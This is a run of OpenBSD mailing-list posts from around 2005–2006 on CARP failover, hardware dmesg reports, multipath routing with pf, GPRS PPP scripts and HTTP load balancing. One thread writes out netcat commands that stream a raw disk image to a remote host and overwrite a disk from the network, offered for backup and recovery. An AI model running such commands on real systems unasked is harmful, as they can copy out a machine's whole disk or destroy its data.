CARP / HSRP problem
I have a pair of 3.9 pf firewalls running CARP. I have two ethernet connections to my provider who is running Cisco HSRP. When they reload the active router or bounce the active interface, then the Ciscos can no longer see the CARP virtual interface until I cause a CARP failover by rebooting the active firewall or admining down the external interface on the active firewall. Through all of this, I have outbound connectivity from the firewall since it is on the same subnet as the Ciscos. I am not sure if anyone else has experienced this, but I am sure Cisco won't fix it. Thanks in advance for your help. Scud
Re: smtpd + dkimsign 7.0 upgraded to 7.1
Hi, you're probably missing something along those lines: pki mail.example.com cert "/etc/ssl/mail.example.com.crt" pki mail.example.com key "/etc/ssl/private/mail.example.com.key" listen on egress tls pki mail.example.com
Re: 3.8 beta requests / test result on HP DL360
On 23 Aug 2005, at 01:33, Theo de Raadt wrote: We are heading towards making the real 3.8 release soonish. I would like to ask the community to do lots of testing over the next week if they can. For info, here is the latest 3.8 i386 snapshot booting on a 'common corporate workhorse' HP DL360, w/ 3GB RAM & 2xCPU and single RAID1 logical disk. Notes: 1. micky's new ciss raid driver work very well, although spits a few "ciss0: cmd_stat 2 scsi_stat 0x0" from time to time. 2. The second NIC (bge1) fails to be attached on a single processor kernel. Anyone got any suggestions for BIOS/boot tweaks to get this working ? 3. if bsd.mp is booted then it drops into ddb> trying to attach bge1. I can try for a com port ps & trace if requested. 4. as mentioned in theo's mail 09-09-2005, bioctl supports only ami so far - I wonder if ciss support is likely ? a documentation issue I suspect. 5. dmesg below: OpenBSD 3.8 (GENERIC) #137: Thu Sep 1 17:41:20 MDT 2005 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Xeon(TM) CPU 2.80GHz ("GenuineIntel" 686-class) 2.80 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,CNXT-ID real mem = 3220783104 (3145296K) avail mem = 2931396608 (2862692K) using 4278 buffers containing 161140736 bytes (157364K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf pcibios0 at bios0: rev 2.1 @ 0xf/0x2000 pcibios0: PCI BIOS has 7 Interrupt Routing table entries pcibios0: PCI Interrupt Router at 000:15:0 ("ServerWorks CSB5 SouthBridge" rev 0x00) pcibios0: PCI bus #0 is the last bus bios0: ROM list: 0xc/0x8000 0xc8000/0x4000 0xee000/0x2000! cpu0 at mainbus0 pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 "ServerWorks CNB20-HE" rev 0x31 pchb1 at pci0 dev 0 function 1 "ServerWorks CNB20-HE" rev 0x00 pchb2 at pci0 dev 0 function 2 "ServerWorks CNB20-HE" rev 0x00 pci1 at pchb2 bus 1 bge0 at pci1 dev 2 function 0 "Broadcom BCM5703X" rev 0x02, BCM5703 A2 (0x1002): irq 11 address 00:0b:cd:4e:4a:3a brgphy0 at bge0 phy 1: BCM5703 10/100/1000baseT PHY, rev. 2 vga1 at pci0 dev 3 function 0 "ATI Rage XL" rev 0x27 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) ciss0 at pci0 dev 4 function 0 "Compaq Smart Array 5i/532 rev.2" rev 0x01: irq 3 ciss0: 1 LD HW rev 1 FW 2.36/2.36 lmap 4000:0 scsibus0 at ciss0: 1 targets sd0 at scsibus0 targ 0 lun 0: SCSI0 0/direct fixed ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 sd0: 34727MB, 34727 cyl, 64 head, 32 sec, 512 bytes/sec, 71122560 sec total vendor "Compaq", unknown product 0xb203 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 0 not configured vendor "Compaq", unknown product 0xb204 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 2 not configured pcib0 at pci0 dev 15 function 0 "ServerWorks CSB5 SouthBridge" rev 0x93 pciide0 at pci0 dev 15 function 1 "ServerWorks CSB5 IDE" rev 0x93: DMA atapiscsi0 at pciide0 channel 0 drive 0 scsibus1 at atapiscsi0: 2 targets cd0 at scsibus1 targ 0 lun 0: SCSI0 5/cdrom removable cd0(pciide0:0:0): using PIO mode 4 ohci0 at pci0 dev 15 function 2 "ServerWorks OSB4/CSB5 USB" rev 0x05: irq 10, version 1.0, legacy support usb0 at ohci0: USB revision 1.0 uhub0 at usb0 uhub0: ServerWorks OHCI root hub, rev 1.00/1.00, addr 1 uhub0: 4 ports with 4 removable, self powered pchb3 at pci0 dev 15 function 3 "ServerWorks CSB5 PCI" rev 0x00 pchb4 at pci0 dev 17 function 0 "ServerWorks CIOBX2" rev 0x05 pchb5 at pci0 dev 17 function 2 "ServerWorks CIOBX2" rev 0x05 pci2 at pchb5 bus 4 bge1 at pci2 dev 2 function 0 "Broadcom BCM5703X" rev 0x02: couldn't establish interrupt at irq 15 isa0 at pcib0 isadma0 at isa0 pckbc0 at isa0 port 0x60/5 pckbd0 at pckbc0 (kbd slot) pckbc0: using irq 1 for kbd slot wskbd0 at pckbd0: console keyboard, using wsdisplay0 pms0 at pckbc0 (aux slot) pckbc0: using irq 12 for aux slot wsmouse0 at pms0 mux 0 pcppi0 at isa0 port 0x61 midi0 at pcppi0: spkr0 at pcppi0 sysbeep0 at pcppi0 npx0 at isa0 port 0xf0/16: using exception 16 pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo fdc0 at isa0 port 0x3f0/6 irq 6 drq 2 fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec biomask e7ed netmask efed ttymask ffef pctr: user-level cycle counter enabled ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 dkcsum: sd0 matches BIOS drive 0x80 root on sd0a ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 rootdev=0x400 rrootdev=0xd00 rawdev=0xd02 ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 ciss0: cmd_stat 2 scsi_stat 0x0 # #
Booting hangs at fxp detection (and crypto h/w)
Hi, I'm having trouble booting an i386 box - it seems to hang at detecting the fxp NICs (2 present, on motherboard, not possible to disable in BIOS). If I enable verbose booting in UKC it hangs at: ... >>>probing for pcic* >>>pcic probe returned 0 >>>fxp probe won fxp0 at pci0 dev 16 function 0 "Intel 82559ER" rev 0x09 below is the complete dmesg, with fxp disabled to get it complete. Anyone any ideas on possible causes/workaround ? Also the "vendor "Invertex", unknown product 0x0006 (class processor subclass Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured" should be a HiFn crypto card. Any ideas why this is not recognised ? thanks, /Pete #dmesg OpenBSD 3.8-current (GENERIC) #202: Wed Oct 19 17:52:24 MDT 2005 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 449 MHz cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX real mem = 536453120 (523880K) avail mem = 482627584 (471316K) using 4278 buffers containing 26927104 bytes (26296K) of memory User Kernel Config UKC> disable fxp 103 fxp* disabled 104 fxp* disabled UKC> exit Continuing... mainbus0 (root) bios0 at mainbus0: AT/286+(d9) BIOS, date 11/16/00, BIOS32 rev. 0 @ 0xfc960 pcibios0 at bios0: rev 2.1 @ 0xfc9d0/0x900 pcibios0: PCI BIOS has 11 Interrupt Routing table entries pcibios0: PCI Exclusive IRQs: 3 4 5 7 9 10 11 12 14 15 pcibios0: PCI Interrupt Router at 000:07:0 ("Acer Labs M1533 ISA" rev 0x00) pcibios0: PCI bus #1 is the last bus ipmi at mainbus0 not configured cpu0 at mainbus0 pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 "Acer Labs M1541 PCI" rev 0x04 ppb0 at pci0 dev 1 function 0 "Acer Labs M5243 AGP/PCI-PCI" rev 0x04 pci1 at ppb0 bus 1 ohci0 at pci0 dev 2 function 0 "Acer Labs M5237 USB" rev 0x03pci_intr_map: no mapping for pin A : couldn't map interrupt "Acer Labs M7101 Power" rev 0x00 at pci0 dev 3 function 0 not configured pcib0 at pci0 dev 7 function 0 "Acer Labs M1533 ISA" rev 0xc3 vendor "Invertex", unknown product 0x0006 (class processor subclass Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured pciide0 at pci0 dev 15 function 0 "Acer Labs M5229 UDMA IDE" rev 0xc1: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility wd0 at pciide0 channel 0 drive 0: wd0: 16-sector PIO, LBA, 19092MB, 39102336 sectors wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2 pciide0: channel 1 disabled (no drives) "Intel 82559ER" rev 0x09 at pci0 dev 16 function 0 not configured "Intel 82559ER" rev 0x09 at pci0 dev 18 function 0 not configured isa0 at pcib0 isadma0 at isa0 pckbc0 at isa0 port 0x60/5 pckbd0 at pckbc0 (kbd slot) pckbc0: using irq 1 for kbd slot wskbd0 at pckbd0: console keyboard pcppi0 at isa0 port 0x61 midi0 at pcppi0: spkr0 at pcppi0 sysbeep0 at pcppi0 lpt0 at isa0 port 0x378/4 irq 7 npx0 at isa0 port 0xf0/16: using exception 16 pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo pccom0: console pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo fdc0 at isa0 port 0x3f0/6 irq 6 drq 2 biomask ff65 netmask ff65 ttymask ffe7 pctr: user-level cycle counter enabled mtrr: K6-family MTRR support (2 registers) dkcsum: wd0 matches BIOS drive 0x80 root on wd0a rootdev=0x0 rrootdev=0x300 rawdev=0x302 #
Q: why is OpenBSD's openssl build without -pthread ???
Hi, Can anyone tell me why OpenBSD's openssl not build with -pthread ? I'm evaluating 'pound' SSL reverse proxy ( http://www.apsis.ch/ pound/ ), which seems to require threaded SSL libs. The OpenBSD supplied openssl seems to have threads disabled, but if I retrieve & make a local copy with the -pthread complier option, it seems to build & run fine. I'm sure there's a good reason for it not being enabled by default - I'm just interested to know what is it... thanks /Pete
rapid response to ordering :-)
Hi, Just to say thanks to all involved. I ordered my 3.8CDs on via OpenBSD/europe page on tuesday, and they arrived today (friday)... in Norway. All in tact and unblemished (as usual). Great service, thanks :-) /Pete
Re: CDP with OpenBSD
Hi, On 19. nov. 2005, at 18.58, [EMAIL PROTECTED] wrote: Hi All, I am searching for a Tool with which I can do the Cisco Discovery Protocol (CDP) requests on no such things as CDP requests. A host can merely transmit (broadcast) CDP info packets (by default every 60secs), and/or listen for them. a OpenBSD. I searched in the ports and packets but did not find any. Does anyone know one? I've used this before: http://sourceforge.net/projects/scdp/ you need to tweak a couple of trivial 'all the world is x86' bugs, if all your world is not I'll make a port if there's any demand. After a Google search I found only a pen test tool. http://yersinia.sourceforge.net/ Looks interesting. I tried to install it on a OpenBSD 3.7 Stable. I got Libpcap (at least 0.8.x) library is needed in order to compile Yersinia!!... I downloaded the http://www.tcpdump.org/release/libpcap-0.9.4.tar.gz but I was not sure to which directory I should it install. Any hints how to upgrade the libpcap libraries and to which directory without getting any problems? Thanks, Stefan
additional features in bsd.rd
Hi Developers, I have a suggestion regarding ramdisk / bsd.rd : I believe it (they) could be even more useful with the additional of the 'nc' utility on it's internal filesystem. I added a line referencing /usr/bin/nc to (for example) /usr/src/ distrib/i386/common/list, and made a release(8). The resulting bsd.rd file was not significantly bigger (in my completely unqualified opinion). However I could then: 1. Get a dmesg output from CD-ROM booted bsd.rd to my other machine for emailing etc. # dmesg | nc 10.20.30.40 1234 2. Get information off a machine, either for backup purposes or data recovery etc. # dd if=/dev/rwd0c | nc 10.20.30.40 1234 3. Restore a 'disk image' from above... # nc -l 1234 | dd of=/dev/rwd0c ( I keep a spare USB 802.11g ural http://www.gigabyte-usa.com/ Communication/Products/Products_Wireless_GN-WBKG.htm device and an official CD along with my laptop on customer visits, so this would be very convenient for me...) If I've overlooked something, or if the size increase is infact significant (and breaks something else), then I appologies, otherwise I hope it's a valid & useful suggestion... p.s. I'm aware that any such network transfers would be unencrypted, obviously depending on the sensitivity, an ethernet cross-over cable could be used. Just because I give you a gun doesn't mean to have to shoot yourself in the foot with it /Pete
Re: additional features in bsd.rd
On 22. nov. 2005, at 12.42, Stuart Henderson wrote: --On 22 November 2005 12:01 +0100, Pete Vickers wrote: 1. Get a dmesg output from CD-ROM booted bsd.rd to my other machine for emailing etc. # dmesg | nc 10.20.30.40 1234 3. Restore a 'disk image' from above... # nc -l 1234 | dd of=/dev/rwd0c You can already do those things with 'ftp -o -'.. unless I read ftp(1) incorrectly, then it supports retrieve only, with no ability to send - which was my main desire. 2. Get information off a machine, either for backup purposes or data recovery etc. # dd if=/dev/rwd0c | nc 10.20.30.40 1234 I'm not sure the ability to dd a raw image directly is worth the extra bytes (if you look at cvs log, you'll see that quite small savings are considered important - 16k is huge in comparison to some of these). ability to get info / files / data _off_ the machine really. But I suspect you may be correct that 16k is too 'expensive'. /Pete
Re: additional features in bsd.rd
On 23. nov. 2005, at 23.03, Chris Kuethe wrote: On 23/11/05, Olivier Cherrier <[EMAIL PROTECTED]> wrote: You can download and upload files using ftp(1). I use to do it since OpenBSD 2.9, using standard floppies. i think he wants to do something like ftp -u /tmp/thingy ftp://myserver/pub/incoming/dmesg.txt to upload /tmp/thingy to myserver, or dd if=/dev/wd0c bs=256k | ftp -u - ftp://myserver/pub/incoming/ wd0c.img to send a disk image someplace. more than once i've built static copies of nc and brought them into the ramdisk with ftp just so that i could send disk images out... Yep, the point is that in lots of situations, you need to get info/ data on/off a machine 'running' bsd.rd, and nc is, in best unix tradition, a simple, efficient , and very convenient tool to do so. You don't even need the hassle of firing up ftpd and sorting accounts etc on another machine, nc will do there too. Since there are already several different versions of restricted space 1.44MB floppy images (floppy/B/C), and also fuller featured CD fs, maybe nc could be added just to the CD version? /Pete
Re: #define failure opportunity
On 11/28/05, Qv6 <[EMAIL PROTECTED]> wrote: > On Monday 28 November 2005 04:04 pm, Theo de Raadt wrote: > > This is why OpenBSD/OpenSSH does not need to hire a spin doctor. > > > > Other people do it for us ;) > > > > http://www.ssh.com/company/newsroom/article/684/ > > > > And... thanks to those of you who supported us when they were > > threatening to sue us years ago.. > > > Intersting news. > > I once worked for a major Telecom firm that used a commercial > implementation of ssh. I was curious and I asked one of the other > techies why pay for ssh when openssh is available. "Because we can go > to the company for support" was his answer. > > I couldn't help but wonder what type of issues people encounter while > using openssh. Aside from the usuall software bugs, has there really > been any major problems with openssh that the community has not fixed > promptly? > > Not that I don't think openssh is superior for the fact that it *is* open software, I bet that the company in question needs software support lisc. for legal issues. If the software goes tit's up and costs the company N dollar's it is easier to get that money from a commercial entity whom you have a contract with (or more likely get money via a insurance broker of some sort). At least that's the best I've been able to see through that line of reasoning :^) -p -- ~~o0OO0o~~ Pete Wright www.nycbug.org NYC's *BSD User Group
Re: my multipath routing questions...
Hi, Dunno if OBSD & your ISP supports it, but maybe try running multi- link ppp over the links, to 'bond' them into a single virtual interface which routing could point at... Alternatively if you are hosting, presumably most of your trafffic is orginating 'inbound' from the 'net, and thus your ISP will decide which physical link to send the packets down - a route-to/reply-to on your end should just keep the ip 'conversation' on that pipe. If most of your traffic is 'outbound' originated, (e.g. just users surfing all day long), then you could (and this is just an ugly hack to get you going), still use openbgp to announce your prefixes, but don't couple FIB with kernel table, and instead have a script periodically parse a 'bgpctl sh routes...or..suchlike' output, and then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'. Obviously tweaks like polling i/f stats to measure individual utilisation and biase the number of prefixes sent to each, are possible. Like I said, a hack, but might get you out of a tight spot... what about multiple bgp sessions ? /Pete On 30. nov. 2005, at 07.26, andrew fresh wrote: Hijacking this thread, cuZ now I am worried . . . . On Mon, Nov 28, 2005 at 11:46:56PM -0800, David Ulevitch wrote: I'd like to hear how people are using OpenOSPFd I will prbly use OpenOSPFd in the future, but at the moment, my question is about using OpenBGPd and multiple lines from the same provider. I am getting 4 T1s from a single provider. Issues with local telco "facilities" for T3's and other things are causing me problems with getting anything different. I am going to end up with something like this: san0-\ san1-\\ all connected to a single provider san2-// san3-/ Now, I assume I will have a single BGP session with them. (I have very little information for lines that are supposed to be installed tomorrow morning at 9am). Right now I have a cisco 3640 that has 2 T1's from AT&T and 2 from Sprint, it has enough trouble with those which is why I want to replace it with an OpenBSD box. I am going to have an iBGP session with the 3640 and an eBGP session with my new provider. I will be adding 20Mb over ethernet at some point in the fairly near future (if they can ever get it installed) and will hopefully be getting rid of the 3640 at that point. The OpenBSD router will not be doing any NAT, it will be passing public IPs. This is what has me worried: On Tue, Nov 29, 2005 at 03:33:07PM +0100, Claudio Jeker wrote: There is no kernel support for multipath routing. I want to load balancing across those 4 T1s and it is sounding like I will not be able to do that and will have to figure out how to get these 4 new lines into my old cisco router. Unfortunately trunk(4) doesn't work with san interfaces :-( and that is how it looked possible to do the bonding/inverse muxing that I was going for. $ ifconfig trunk0 trunkport san0 trunkport san1 ifconfig: SIOCSTRUNKPORT: Protocol not supported It would be really kewl to use the trunk(4) interface for the BGP peer address, since it now does failover, it would be up as long as any individual lines were up. It would be even kewler if it would be able to change the weighting on that interface depending on the number of lines in the trunk, but I guess I am dreaming again. I guess I am looking for something like 'ip load-sharing per- packet' in cisco terms. But my real question is: How do I get OpenBSD to treat those 4 T1s as a single line and share the load across them? or, how do I get a reasonable approximation from OpenBSD? Also, with those 4 T1s, I want to make sure that in case any of the 4 go down, the BGP session will stay up. With a cisco box, I just bind the session to a loopback address, add routes for each interface and it will choose one of the interfaces that is up to get to the destination. How do I do this with OpenBSD? Will the BGP session just work when I solve the load balancing issue? or do I have to do weird things with ifstated(8) (like 16 states for the 4 lines and lots of route add/delete statements)? or something with 'route-to' in pf? http://marc.theaimsgroup.com/?l=openbsd-misc&m=112831360613745&w=2 This seems to work in my test environment: # t1s is an interface group containing all of the links to that provider pass out on t1s route-to { \ (san0 10.35.0.2) \ (san1 10.35.1.2) \ (san2 10.35.2.2) \ (san3 10.35.3.2) \ } round-robin keep state pass in on san0 reply-to (san0 10.35.0.2) keep state pass in on san1 reply-to (san1 10.35.1.2) keep state pass in on san2 reply-to (san2 10.35.2.2) keep state pass in on san3 reply-to (san3 10.35.3.2) keep state l8rZ, -- andrew - ICQ# 253198 - JID: [EMAIL PROTECTED] Proud member: http://www.mad-techies.org BOFH excuse of the day: telnet: Unable to connect to remote host: Connection refused
Re: my multipath routing questions...
Hi, On 30. nov. 2005, at 13.21, Claudio Jeker wrote: On Wed, Nov 30, 2005 at 12:53:32PM +0100, Pete Vickers wrote: Hi, Dunno if OBSD & your ISP supports it, but maybe try running multi- link ppp over the links, to 'bond' them into a single virtual interface which routing could point at... sppp(4) does not support multilink ppp. shame... Alternatively if you are hosting, presumably most of your trafffic is orginating 'inbound' from the 'net, and thus your ISP will decide which physical link to send the packets down - a route-to/reply-to on your end should just keep the ip 'conversation' on that pipe. If most of your traffic is 'outbound' originated, (e.g. just users surfing all day long), then you could (and this is just an ugly hack to get you going), still use openbgp to announce your prefixes, but don't couple FIB with kernel table, and instead have a script periodically parse a 'bgpctl sh routes...or..suchlike' output, and then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'. Obviously tweaks like polling i/f stats to measure individual utilisation and biase the number of prefixes sent to each, are possible. Uhm. I think you switched the two. hosting has mostly outbound traffic while end user cause inbound traffic. no switch i believe. Although I agree hosting => mostly outbound traffic, the IP conversation is initialed from the remote party, _inbound_ . And therefore it's the ISP which decides which link to send the TCP SYN ( or whatever) down, and thus basic route-to packet directing would tie the entire conversation to that same line. Like I said, a hack, but might get you out of a tight spot... what about multiple bgp sessions ? Wont help much unless you start some real evil filtering to balance the 4 t1 links. /Pete On 30. nov. 2005, at 07.26, andrew fresh wrote: Hijacking this thread, cuZ now I am worried . . . . On Mon, Nov 28, 2005 at 11:46:56PM -0800, David Ulevitch wrote: I'd like to hear how people are using OpenOSPFd I will prbly use OpenOSPFd in the future, but at the moment, my question is about using OpenBGPd and multiple lines from the same provider. I am getting 4 T1s from a single provider. Issues with local telco "facilities" for T3's and other things are causing me problems with getting anything different. I am going to end up with something like this: san0-\ san1-\\ all connected to a single provider san2-// san3-/ Now, I assume I will have a single BGP session with them. (I have very little information for lines that are supposed to be installed tomorrow morning at 9am). Right now I have a cisco 3640 that has 2 T1's from AT&T and 2 from Sprint, it has enough trouble with those which is why I want to replace it with an OpenBSD box. I am going to have an iBGP session with the 3640 and an eBGP session with my new provider. I will be adding 20Mb over ethernet at some point in the fairly near future (if they can ever get it installed) and will hopefully be getting rid of the 3640 at that point. The OpenBSD router will not be doing any NAT, it will be passing public IPs. This is what has me worried: On Tue, Nov 29, 2005 at 03:33:07PM +0100, Claudio Jeker wrote: There is no kernel support for multipath routing. I want to load balancing across those 4 T1s and it is sounding like I will not be able to do that and will have to figure out how to get these 4 new lines into my old cisco router. Unfortunately trunk(4) doesn't work with san interfaces :-( and that is how it looked possible to do the bonding/inverse muxing that I was going for. $ ifconfig trunk0 trunkport san0 trunkport san1 ifconfig: SIOCSTRUNKPORT: Protocol not supported It would be really kewl to use the trunk(4) interface for the BGP peer address, since it now does failover, it would be up as long as any individual lines were up. It would be even kewler if it would be able to change the weighting on that interface depending on the number of lines in the trunk, but I guess I am dreaming again. I guess I am looking for something like 'ip load-sharing per- packet' in cisco terms. But my real question is: How do I get OpenBSD to treat those 4 T1s as a single line and share the load across them? or, how do I get a reasonable approximation from OpenBSD? Also, with those 4 T1s, I want to make sure that in case any of the 4 go down, the BGP session will stay up. With a cisco box, I just bind the session to a loopback address, add routes for each interface and it will choose one of the interfaces that is up to get to the destination. How do I do this with OpenBSD? Will the BGP session just work when I solve the load balancing issue? or do I have to do weird things with ifstated(8) (like 16 states for the 4 lines and lots of route add/delete statements)? or something with 'route-to' in
Re: upgrade halted
if you can read /var/log/authlog, you are in wheel (unless you've changed perms on it). So just use scp to copy ksh to /usr/local/bin/ tcsh... /Pete On 19. apr. 2006, at 17.15, Jasper Bal wrote: Nick Holland schreef: and then log in (or have them disable PF or ...). You can also look at /var/log/authlog for clues as to why you can't log in as you wish now. Nick. Thanks Nick. Look what I found in authlog: Apr 19 16:09:17 Speculum sshd[15678]: User jabal not allowed because shell /usr/local/bin/tcsh does not exist This is probably stupid, but I removed the tcsh pkg. I did think about possible difficulties logging in without, but i didn't think long enough. All my users use tcsh. Root uses csh. If I could only remember the password... Jasper
Nokia D211 GPRS/WLAN pc-card
Hi, I've just spent some time trying to get a Nokia D211 pc-card to function under OpenBSD (i386 / -current). It didn't meet with any success, so the main point of this email is to document what I tried for the archives/google. In the event anyone has had more success than me, please let me know. The card overview is available here - http://nokia.com/phones/ nokiad211/ and it essentially contains both a GPRS(GSM) radio and an 802.11b radio. However whilst windows and linux driver are available for download, it is a dreaded binary blob, and thus virtually useless under OpenBSD unless documentation is forthcoming. Since Nokia also have single function GPRS cards "Nokia Card Phone 2.0" ( http://www.europe.nokia.com/cda1/0,4267,2522,00.html ), I tried tweaking /usr/src/sys/dev/pcmcia/pcmciadevs etc to get the driver to attach it as one of them. And whilst the driver appears to attach: pccom3 at pcmcia0 function 0 "Nokia, D211" port 0xa000/16: ns8250, no fifo it is clearly different from a real Card Phone: pccom3 at pcmcia0 function 0 "Nokia Mobile Phones, Nokia Card Phone" port 0xa000/16: ns16550a, 16 byte fifo and pointing 'tip' at it does not yield anything. Nokia also produce a single function 802.11b card "C110" ( http:// www.europe.nokia.com/nokia/0,8764,2701,00.html ), so I also tried adding the D211's pcmcia details in /usr/src/sys/dev/pcmcia/ if_wi_pcmcia.c etc to get that driver to attach. Alais was also unsucessful, whilst the driver attached, the dmesg line indicated that the driver failed to retrieve a MAC address from the card, and no interface was created. /Pete
Re: entering custom AT commands into ppp.conf
Hi, Here's my configs, should give you some hints.. mobile phone is connected to 'COM1' at 57600baud, adding a system default route via the new ppp link, and automatically redialing immediately after link failure: =/etc/ppp/peers/ISP /dev/tty00 57600 defaultroute debug #kdebug 7 lock user my_username noauth noccp novj noipdefault persist #demand connect '/usr/sbin/chat -e -v -f /etc/ppp/peers/chat/ISP-gprs' = script to initialise modem, and dial ISP: (CFUN/CPIN... is to reset the phone, then enter the PIN code etc) =/etc/ppp/peers/chat/ISP-gprs REPORT "Starting chat script..." ABORT ERROR ABORT BUSY ABORT 'NO CARRIER' ABORT 'NO DIALTONE' '' ATZ OK AT+CFUN=1,1 OK \d\dAT+CPIN=1234 OK AT+CGDCONT=1 OK AT+CGDCONT=1,"IP","my.apn.name",,0,0 OK ATD*99***1# CONNECT = your ISP username & password (see pap-secrets instead if applicable): =/etc/ppp/peers/chap-secrets #secrets for authentication using CHAP # clientserver secret IP addresses my_username * my_password* = create the i/f at boot time, and initiate connection: =/etc/hostname.ppp0 up !pppd call ISP = To debug: - $ sudo ifconfig ppp0 create - $ sudo pppd dial ISP - tail /var/log/daemon, /var/log/chat (after syslogd.conf uncommenting/restart) and /etc/ppp/connection-errors Hope this is of use. /Pete On 8. jun. 2006, at 08.07, Marius Van Deventer - Umzimkulu wrote: Hi all. By asking this queston i admit that i have no idea how ppp.conf works. For a normal modem i am able to configure it fine, but for this problem i have to admit that i have no idea. I found some hits on google but nothing specific. I managed (finally) to get gprs working on OpenBSD using my Nokia 6680. Apart from some defalt route issues it works fine. But... I have to enter the init strings manually using minicom before i dial. i enter: ATZ and then AT+CGDCONT=1,"IP","internet" then i exit minicom with no reset (ctrl-a q) and dial. Obviously there HAS to be a way to include these in ppp.conf. All my attempts have failed. I'm sorry for the newbie-like question. Please direct answers to the list and flames to my private address :-) Cheers Marius Van Deventer Computer Technician Bytes Technology Group : Systems Integration Tel : +27 39 682 4202 | Fax : +27 39 682 4126 | Cell : +27 82 321 6491 Email : [EMAIL PROTECTED] Web : www.btgroup.co.za | Press Office : www.itweb.co.za/office/bytes | Licensing : www.purelicensing.co.za Bytes Systems Integration (Pty) Ltd : Registration No: 1995/012031/07 A subsidiary of Bytes Technology Group SA (Pty) Ltd, In association with KAGISO P O Box 4004, Umhlanga, 4350 ,55 Island Circle, Riverhorse Valley, Nandi Drive, South Africa. E-mail Disclaimer: http://www.altron.co.za/email.asp Or phone: (+27) (11) 205-7000 by Symantec Mail Security for the presence of any viruses. ** 0 <<< [demime 1.01d removed an attachment of type application/x-pkcs7- signature which had a name of smime.p7s]
new hardware platform ?
Hi, After contemplating for sometime between buying a Zaurus C3100 and a HPC jazjar/universal (aka Qtek 9000, i-mate, O2 XDA Exec, T-Mobile MDA IV etc), to satisify my requirement for mobile remote administration needs etc. I decided to go with the Jazjar, and try to live with MS windows mobile v5 (along with 3rd party SSH client etc), for the added benefit of integrated connectivity and phone etc. An overview of the device can be found here: http://www.gsmarena.com/qtek_9000-1264.php http://www.qtek.nu/europe/products/9000/specifications.aspx However, as could possibly have been predicted, Windows is driving me mad, with frequent crashes, reboots, and hanging etc. But I really like the additional hardware features over the Zaurus, such as: - better size for pocket - built in wlan - built-in bluetooth - backlit keyboard - built in 3G tranceiver - built in mobile phone - built in video-conferencing ( 2 x video cameras) So what I'm wondering is if any developers would like to try porting OpenBSD to the Jazjar platform ? I appreciate that the Zaurus port already exists for this niche, and that sufficient documentation would almost certainly be problematic/impossible to aquire for the Jazjar, but I'm hoping someone would like to try ? The biggest problem that I can see with the Jazjar is the lack of physical internal disk. (It has 64MB SDRAM, and 128MB flash ROM) but I'm hoping this could be suplimented with a 1 or 2GB card in the integrated SDIO/MMC slot. Prehaps for development, remote booting is possible via either WLAN or USB conected ethernet ? For interest, there are some addional hardware details and initial linux support for the device here: http://wiki.xda-developers.com/index.php?pagename=UniversalResearch http://wiki.xda-developers.com/index.php?pagename=UniversalProgress Obviously in addition to willing developer(s), some hardware would be needed to hack on. I guess at least 2 of the devices would be needed, and they run at just under $1000 USD each (including taxes, without discounts). I'm willing to stump up a significant proportion of one device if there is enough interest - both from developers and other potential users. Comments ? (flame proof clothing donned) /Pete
Re: HTTP Load balancer
On 7. jul. 2006, at 00.11, Clint Pachl wrote: Richard Wilson wrote: Hulloo list, Can anyone recommend a load balancer for http/https for OpenBSD? Currently I'm using Pound, from http://www.apsis.ch/pound/ which runs under OpenBSD, and supports connection tracking via IP, cookie and request ID (eg PHPSESSID) and seems to do everything I need. pf: see pf(4) pf.conf(5) pfctl(8) pfsync(4) It can balance using round-robin, random, and source-hash. Stickiness can be applied to the round-robin and random methods. The stickiness option and source-hash method will satisfy https, and http if you are not sharing session data among servers. Best of all, pf is is built right in and simple as hell to use. All you need to do is config your existing firewall or put a pf box in front of your webservers. Hell, you could probably even run it on all of your webservers in a carp group (haven't done this, but seems feasible). Added bonus, pf inherently balances other services, not just http! Oh, another bonus, you can easily have automatic fail-over using pfsync and carp! I'm not sure you can beat the simplicity and robustness of pf. As far as I'm concerned, pf obsoleted all load balancers for me. I used to use pen to balance http traffic. Because of pen's design, there were discrepancies in the web logs, where all connections, from the webservers POV, were coming from the pen load balancer. So there was an add on program, a hack, that was needed to later resolve web logs. It worked well, but what a mess. I would like to hear why people would not desire pf over some other load balancing option. -pachl pound can 1. operate ( route, alter, etc) on/at L7, e.g HTTP headers/URLs 2. do https<-->http forwarding, e.g SSL off-loading 3. log URLs with source/dest IP etc none of these can be done via pf (unless i'm mistaken) /Pete
Re: need a machine for an itanium port
